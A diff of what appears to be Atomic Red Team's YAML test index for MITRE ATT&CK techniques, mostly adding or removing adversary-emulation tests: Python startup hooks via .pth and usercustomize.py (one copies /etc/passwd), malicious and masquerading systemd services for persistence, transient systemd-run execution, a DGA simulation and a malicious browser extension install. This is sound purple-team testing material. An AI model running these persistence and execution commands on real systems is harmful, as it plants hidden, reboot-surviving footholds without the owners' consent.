mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -28422,7 +28282,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -28445,586 +28305,7 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests:
- name: Create and Enable a Malicious systemd Service Unit
auto_generated_guid: e58c8723-5503-4533-b642-535cd20ec648
description: |
Creates a new systemd service unit file in /etc/systemd/system/ and enables it using
systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow
to establish persistence or execute arbitrary commands under the context of systemd.
This simulates the full attacker workflow: writing the unit file, reloading the systemd
daemon, enabling the service to survive reboots, and starting it immediately. This is
consistent with techniques observed in ransomware precursor activity and post-exploitation
frameworks targeting Linux infrastructure.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the malicious service to create
type: string
default: atomic-test
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "echo atomictest > /tmp/atomic_service_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable.
Ensure systemd is installed."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_service_output.txt
- name: Create systemd Service Unit from /tmp (Unusual Location)
auto_generated_guid: a1fa406e-2354-4a24-b6d6-94157e7564d4
description: |
Creates a systemd service unit file in /tmp and loads it using systemctl start with
an absolute path. Adversaries may write service unit files to world-writable directories
such as /tmp to avoid triggering alerts on new file creation in standard service
directories, or to execute payloads transiently without permanently installing a service.
Loading a service unit from an arbitrary path rather than a standard systemd directory
is unusual behaviour that should be detectable by monitoring systemctl command arguments.
supported_platforms:
- linux
input_arguments:
service_path:
description: Full path to the service file to be written in /tmp
type: path
default: "/tmp/atomic_tmp.service"
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "id > /tmp/atomic_tmp_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: "/tmp must exist and be writable\n"
prereq_command: 'if [ -d "/tmp" ] && [ -w "/tmp" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "/tmp does not exist or is not writable on this
system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > #{service_path}
echo "Description=Atomic Tmp Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
cleanup_command: |
systemctl stop $(basename #{service_path}) 2>/dev/null || true
rm -f #{service_path}
rm -f /tmp/atomic_tmp_output.txt
- name: Create systemd Service Unit from /dev/shm (Unusual Location)
auto_generated_guid: dce49381-a26b-4d95-bdfa-c607ffe8bee5
description: |
Creates a systemd service unit file in /dev/shm and loads it using systemctl.
/dev/shm is a memory-backed filesystem that is world-writable on most Linux systems
and does not persist across reboots, making it particularly attractive to adversaries
seeking to execute transient payloads while evading file-based forensic detection.
This technique has been observed in post-exploitation scenarios where attackers
deliberately avoid writing to disk-backed locations to limit forensic artefacts.
supported_platforms:
- linux
input_arguments:
service_path:
description: Full path to the service file to be written in /dev/shm
type: path
default: "/dev/shm/atomic_shm.service"
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "whoami > /tmp/atomic_shm_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: "/dev/shm must exist and be writable\n"
prereq_command: 'if [ -d "/dev/shm" ] && [ -w "/dev/shm" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "/dev/shm does not exist or is not writable on this
system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > #{service_path}
echo "Description=Atomic SHM Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
cleanup_command: |
systemctl stop $(basename #{service_path}) 2>/dev/null || true
rm -f #{service_path}
rm -f /tmp/atomic_shm_output.txt
- name: Modify Existing systemd Service to Execute Malicious Command
auto_generated_guid: 6123928f-6389-4914-8d25-a5d69bd657fa
description: |
Creates a service unit file that initially runs a benign command, then modifies the
ExecStart directive using sed to substitute a malicious command before reloading and
restarting the service. Adversaries may hijack existing services to blend in with normal
service activity and avoid triggering detections focused solely on new service creation.
This technique reflects the tradecraft observed in more sophisticated intrusions where
blending into existing process trees is a priority over creating net-new services.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the service to create and then modify for the test
type: string
default: atomic-modify-test
malicious_command:
description: Malicious command to substitute into ExecStart
type: string
default: /bin/bash -c "echo hijacked > /tmp/atomic_hijack_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'sed must be available on the system
'
prereq_command: 'if [ -x "$(command -v sed)" ]; then exit 0; else exit 1;
fi
'
get_prereq_command: 'apt-get install -y sed 2>/dev/null || yum install -y
sed 2>/dev/null || echo "Could not install sed automatically."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_hijack_output.txt
- name: Execute Command via Transient systemd Service (systemd-run)
auto_generated_guid: a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
description: |
Uses systemd-run to execute a command as a transient systemd service without creating
a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary
commands under the context of systemd while bypassing controls that monitor for new
unit file creation, since transient services exist only in memory for their lifetime.
This is a particularly stealthy technique as it leaves minimal on-disk artefacts and
the service disappears from systemctl list-units once execution completes.
supported_platforms:
- linux
input_arguments:
unit_name:
description: Name of the transient systemd unit to create
type: string
default: atomic-transient
command_to_run:
description: Command to execute as a transient service
type: string
default: /bin/bash -c "id > /tmp/atomic_transient_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemd-run must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "systemd-run is not available. Ensure systemd is
installed and up to date."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
systemd-run --unit=#{unit_name} --wait #{command_to_run}
systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
cleanup_command: |
systemctl stop #{unit_name}.service 2>/dev/null || true
rm -f /tmp/atomic_transient_output.txt
- name: Enumerate All systemd Services Using systemctl
auto_generated_guid: 1e5be8d4-605a-4acb-8709-2f80b2d8ea95
description: |
Enumerates all systemd services and their current states using systemctl list-units
and systemctl list-unit-files. Adversaries may enumerate running and enabled services
to identify targets for hijacking, understand the host environment, map installed
security tooling, or identify gaps in monitoring coverage.
Service enumeration is a common reconnaissance step during post-exploitation and may
precede service hijacking or masquerading activity. This test does not require
elevation as service listing is available to unprivileged users on most Linux systems.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
executor:
name: sh
elevation_required: false
command: |
systemctl list-units --type=service --all
systemctl list-unit-files --type=service
cleanup_command: 'echo "No cleanup required"
'
- name: Enable systemd Service for Persistence with Auto-Restart
auto_generated_guid: 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7
description: |
Creates a payload script and a systemd service unit that executes it, then enables
the service to survive reboots using systemctl enable. The service is configured with
Restart=always to automatically restart on failure, mimicking the persistence mechanism
used by adversaries deploying backdoors or beacons on Linux hosts.
This technique is consistent with observed post-exploitation tradecraft where adversaries
establish a foothold that survives reboots and self-heals after interruption, complicating
incident response and remediation efforts.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the persistence service to create
type: string
default: atomic-persist
payload_path:
description: Path to the payload script that the service will execute
type: path
default: "/tmp/atomic_payload.sh"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
- description: 'Payload script must exist at the specified path
'
prereq_command: 'if [ -f "#{payload_path}" ]; then exit 0; else exit 1; fi
'
get_prereq_command: |
echo '#!/bin/bash' > #{payload_path}
echo 'echo persistent >> /tmp/atomic_persist_output.txt' >> #{payload_path}
chmod +x #{payload_path}
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
rm -f /etc/systemd/system/multi-user.target.wants/#{service_name}.service
systemctl daemon-reload
rm -f #{payload_path}
rm -f /tmp/atomic_persist_output.txt
- name: Masquerade Malicious Service as Legitimate System Service
auto_generated_guid: 6fec8560-ff64-4bbf-bc79-734fea48f7ca
description: |
Creates a systemd service with a name and description closely resembling a legitimate
system service to blend in with normal service activity. Adversaries may deliberately
choose service names similar to well-known system services such as systemd-networkd,
cron, or ssh to evade detection from analysts reviewing service lists or automated
alerting on service names.
This masquerading technique is particularly effective in environments where detection
relies on service name allowlists or manual review of systemctl list-units output
rather than behavioural analysis of service unit file contents and ExecStart paths.
supported_platforms:
- linux
input_arguments:
masquerade_name:
description: Service name designed to closely mimic a legitimate system
service
type: string
default: systemd-network-helper
command_to_run:
description: Command the masquerading service will execute
type: string
default: /bin/bash -c "echo masquerade > /tmp/atomic_masquerade_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
- description: 'Chosen masquerade service name must not already exist as a real
service
'
prereq_command: 'if ! systemctl list-unit-files --type=service | grep -q "^#{masquerade_name}.service";
then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "A service named #{masquerade_name} already exists.
Change the masquerade_name input argument to avoid conflicts."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
systemctl start #{masquerade_name}.service
systemctl status #{masquerade_name}.service
cleanup_command: |
systemctl stop #{masquerade_name}.service 2>/dev/null || true
systemctl disable #{masquerade_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_masquerade_output.txt
atomic_tests: []
T1059.009:
technique:
type: attack-pattern
@@ -34190,6 +33471,20 @@ persistence:
3. Click 'Select'
name: manual
- name: Chrome/Chromium (Chrome Web Store)
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
@@ -34241,7 +33536,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -34262,7 +33557,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -39275,7 +38569,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -39311,102 +38605,7 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -39891,7 +39090,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -39921,7 +39120,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -42100,7 +41298,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -42127,45 +41325,7 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests:
- name: DGA Simulation (Python)
auto_generated_guid: cc367493-3a00-4c4a-a685-16b73339167c
description: "Simulates Domain Generation Algorithm (DGA) traffic by generating
pseudo-random domains based on the current date and querying them using dig.
\nThis is designed to trigger DNS analytics and NGIDS.\n"
supported_platforms:
- linux
input_arguments:
python_script_path:
description: Full path to the DGA python script
type: string
default: PathToAtomicsFolder/T1568.002/src/T1568.002.py
dependency_executor_name: bash
dependencies:
- description: "#{python_script_path} must exist on system.\n"
prereq_command: 'if [ -f "#{python_script_path}" ]; then exit 0; else exit
1; fi
'
get_prereq_command: |
mkdir -p "$(dirname "#{python_script_path}")"
curl -sL "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1568.002/src/T1568.002.py" -o "#{python_script_path}"
- description: 'Python 3 must be installed to run the script.
'
prereq_command: 'which python3
'
get_prereq_command: 'sudo apt-get update && sudo apt-get install -y python3
'
executor:
